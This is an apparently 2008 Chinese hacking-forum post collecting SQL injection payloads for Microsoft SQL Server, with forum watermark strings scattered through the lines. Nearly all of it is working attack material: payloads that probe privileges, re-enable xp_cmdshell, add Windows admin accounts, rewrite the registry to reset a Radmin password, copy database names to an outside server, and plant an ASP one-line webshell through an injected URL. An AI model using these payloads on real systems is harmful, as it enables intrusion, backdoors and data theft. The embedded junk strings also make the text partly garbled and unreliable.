论坛积分策略	论坛VIP区开放申请	我爱电脑万人签名活动	原声大碟520欢迎你	广告位招租

‹‹ 上一主题 | 下一主题 ››

打印

[[ 其它 ]] 常用的一些注入命令,方便查询

msppt
找个人帮猴子削铅笔.......

职务：论坛督察

荣誉勋章

论坛版主勋章论坛督察勋章

楼主大中小发表于 2008-6-16 20:53 只看该作者

常用的一些注入命令,方便查询

我记性不好，所以把常用的注入代码记录下来，有点乱，但对我来说，还算很有用，希望大家也会喜欢！
www.520diannao.com2 {  l# J# ^- P/ A
//看看是什么权限的
and 1=(Select IS_MEMBER(’db_owner’)) www.520diannao.com0 B% q% l) C8 J& a
And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;-- www.520diannao.com# c: W7 ]4 k3 @. y5 K& s& }1 D
www.520diannao.com7 h. M; d) G: {
//检测是否有读取某数据库的权限打造最好的电脑自学交流论坛2 s9 {0 N/ w& q4 g( R3 U7 z
and 1= (Select HAS_DBACCESS(’master’))
And char(124)%2BCast(HAS_DBACCESS(’master’) as varchar(1))%2Bchar(124)=1 --
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站, H2 G* i! {& d  b
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站2 E/ k- H) G& Q; }. i
数字类型
and char(124)%2Buser%2Bchar(124)=0 我爱电脑技术论坛/ F5 N( ]3 o; s! L( X% ]
我爱电脑技术社区--打造最好的电脑技术自学交流平台& Y: U, S- m* J6 Z: b7 {
字符类型
’ and char(124)%2Buser%2Bchar(124)=0 and ’’=’ 打造最好的电脑自学交流论坛7 w5 a& Q7 u% E3 n( _
我爱电脑技术论坛$ H2 L/ \6 O' ?3 ^! `3 i
搜索类型
’ and char(124)%2Buser%2Bchar(124)=0 and ’%’=’

爆用户名
and user>0
’ and user>0 and ’’=’ 我爱电脑技术论坛& K! o. n- i" p) m0 a1 i

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER(’sysadmin’));-- 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站5 r% ~  k, ]& g4 p
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站9 h( r' k% V8 R+ P

检测是不是MSSQL数据库 www.520diannao.com& m- T3 K( Q: x/ x/ E7 W, q
and exists (select * from sysobjects);--

检测是否支持多行 www.520diannao.com$ t0 ?) v1 R1 X
;declare @d int;--

恢复 xp_cmdshell www.520diannao.com3 E9 m# Q) x# A1 H6 g# _
;exec master..dbo.sp_addextendedproc ’xp_cmdshell’,’xplog70.dll’;--
我爱电脑技术社区--打造最好的电脑技术自学交流平台' x* \0 b1 j) n% Z  A

select * from openrowset(’sqloledb’,’server=192.168.1.200,1433;uid=test;pwd=pafpaf’,’select @@version’)  www.520diannao.com' e, N9 q( @( w% \6 ]1 N* s; j$ |  b7 L

//----------------------- www.520diannao.com2 W/ E7 ]* y& T4 @$ t6 B/ ^2 z
//    执行命令
//-----------------------
首先开启沙盘模式：
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1

然后利用jet.oledb执行系统命令
select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=c:\winnt\system32\ias\ias.mdb’,’select shell("cmd.exe /c net user admin admin1234 /add")’) 我爱电脑技术论坛7 Y6 D2 w. W% I! {1 t* s. O+ P/ i$ N. [
我爱电脑技术社区--打造最好的电脑技术自学交流平台$ D2 y6 Q/ x! ~, z$ _
执行命令 4 H' _, D7 h2 x3 r7 g  A! O
;DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add’;-- 打造最好的电脑自学交流论坛1 [$ _9 D' C0 T. ^) a

EXEC [master].[dbo].[xp_cmdshell] ’cmd /c md c:\1111’ www.520diannao.com! `9 I, b3 `) c& [- ^6 E3 w

判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ’X’ AND name = ’xp_cmdshell’)

写注册表我爱电脑技术社区--打造最好的电脑技术自学交流平台2 d' s8 f$ S# G$ F6 Y
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1 我爱电脑技术论坛$ n. x% R) Q' u; k' A

REG_SZ
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站: n7 {/ k! H( f/ J3 a- b
读注册表我爱电脑技术论坛0 c- z" t: j, T% J7 c
exec master..xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,’Userinit’ 我爱电脑技术社区--打造最好的电脑技术自学交流平台; Q- {3 C1 q* {% Y0 s4 ^

读取目录内容
exec master..xp_dirtree ’c:\winnt\system32\’,1,1 www.520diannao.com0 h2 E/ ^5 ?. b, f% ^* a

数据库备份
backup database pubs to disk = ’c:\123.bak’
我爱电脑技术社区--打造最好的电脑技术自学交流平台# @! }$ Q# X! |( [( F
//爆出长度 & A, `% y  n& F* v* \8 C& s
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

8 {; M. [7 |$ w2 C- @3 r* Y& y
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站2 ~6 `- q  R1 d! F
更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,’新密码’,’sa’
www.520diannao.com7 P5 y) O- S/ x' s2 M6 x
添加和删除一个SA权限的用户test：打造最好的电脑自学交流论坛+ I: I' l1 a5 A1 G9 W! G/ @! t# R* }
exec master.dbo.sp_addlogin test,ptlove 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站' s# J( ^) d7 H/ y3 T# I* g/ b( J
exec master.dbo.sp_addsrvrolemember test,sysadmin
我爱电脑技术社区--打造最好的电脑技术自学交流平台  V9 b- G& \0 v. f
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc ’xp_cmdshell’
打造最好的电脑自学交流论坛, C: N4 ~0 n9 k
添加扩展存储过过程
EXEC [master]..sp_addextendedproc ’xp_proxiedadata’, ’c:\winnt\system32\sqllog.dll’  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站' b3 W1 }, j8 W$ g: F* d. [
GRANT exec On xp_proxiedadata TO public  www.520diannao.com$ e, _8 @3 ~/ b. u

打造最好的电脑自学交流论坛" K1 O- c0 f+ g( P
停掉或激活某个服务。  电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站7 p6 u0 g' ?, ^$ p& K0 Q$ `1 w

exec master..xp_servicecontrol ’stop’,’schedule’
exec master..xp_servicecontrol ’start’,’schedule’ 打造最好的电脑自学交流论坛* H4 a; ]8 `2 ?; A

dbo.xp_subdirs 打造最好的电脑自学交流论坛) O# C/ g4 q' X7 c/ p
www.520diannao.com* H9 s4 |/ v# X5 r) f( u# \( v
只列某个目录下的子目录。电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站) N2 S6 |& d/ E# \5 O
xp_getfiledetails ’C:\Inetpub\wwwroot\SQLInject\login.asp’

dbo.xp_makecab
www.520diannao.com4 q8 P5 y5 P, z0 W
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
我爱电脑技术论坛9 g, Z& Q8 V; d) _9 M/ \. X
dbo.xp_makecab
’c:\test.cab’,’mszip’,1, 我爱电脑技术论坛! c$ r9 X9 ?3 D# A" b3 c& ?' o+ I
’C:\Inetpub\wwwroot\SQLInject\login.asp’, 我爱电脑技术社区--打造最好的电脑技术自学交流平台$ k* }! J3 u3 }9 u8 `% c8 O& R
’C:\Inetpub\wwwroot\SQLInject\securelogin.asp’ 我爱电脑技术论坛0 j8 C! A7 s- R

xp_terminate_process
www.520diannao.com& f  l& Z, `; R/ c
停掉某个执行中的程序，但赋予的参数是 Process ID。我爱电脑技术论坛2 p2 d% X8 v5 o) d5 r4 {5 ~
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站, K( ~) T5 M6 B( r/ g. h& W
xp_terminate_process 2484 电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站5 r! g2 A% K9 _5 l# N' }
打造最好的电脑自学交流论坛* b8 v% n" A; }6 l/ J+ _- H- `
xp_unpackcab

解开压缩档。
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站9 z" T+ W4 E' c$ f" P0 g
xp_unpackcab ’c:\test.cab’,’c:\temp’,1
我爱电脑技术论坛: v0 _3 C3 Z. D. E+ y

某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’Parameter’,’REG_BINARY’,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’port’,’REG_BINARY’,0xd20400 则端口值改为1234 www.520diannao.com' R1 l' j( Z. O4 R! X0 ]( A7 ~3 }
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站/ Y# Z" W* }7 l
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
我爱电脑技术论坛4 o1 b& c2 y6 Z/ K* V# z, |& o
//得到数据库名
insert into opendatasource(’sqloledb’,’server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx’).lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中创建表，看看权限怎样 * z% \, k' q* H. ~
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- 我爱电脑技术论坛8 j7 Q$ ?! u7 w. E
电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站. B$ U* X, \/ v
用 sp_makewebtask直接在web目录里写入一句话马：我爱电脑技术论坛+ F# z  e6 {3 O2 t6 g* X
http://127.0.0.1/dblogin123.asp?username=123’;exec%20sp_makewebtask%20’d:\www\tt\88.asp’,’%20select%20’’<%25execute(request("a"))%25>’’%20’;--
我爱电脑技术社区--打造最好的电脑技术自学交流平台  e6 n5 r4 J; f4 e: F9 L
//更新表内容电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站0 P4 }4 n; K( W1 K* D
Update films SET kind = ’Dramatic’ Where id = 123 我爱电脑技术社区--打造最好的电脑技术自学交流平台2 b- G/ I8 b: k

//删除内容打造最好的电脑自学交流论坛% `# X- p* A, t1 T: F2 l
delete from table_name where Stockid = 3

TOP

‹‹ 上一主题 | 下一主题 ››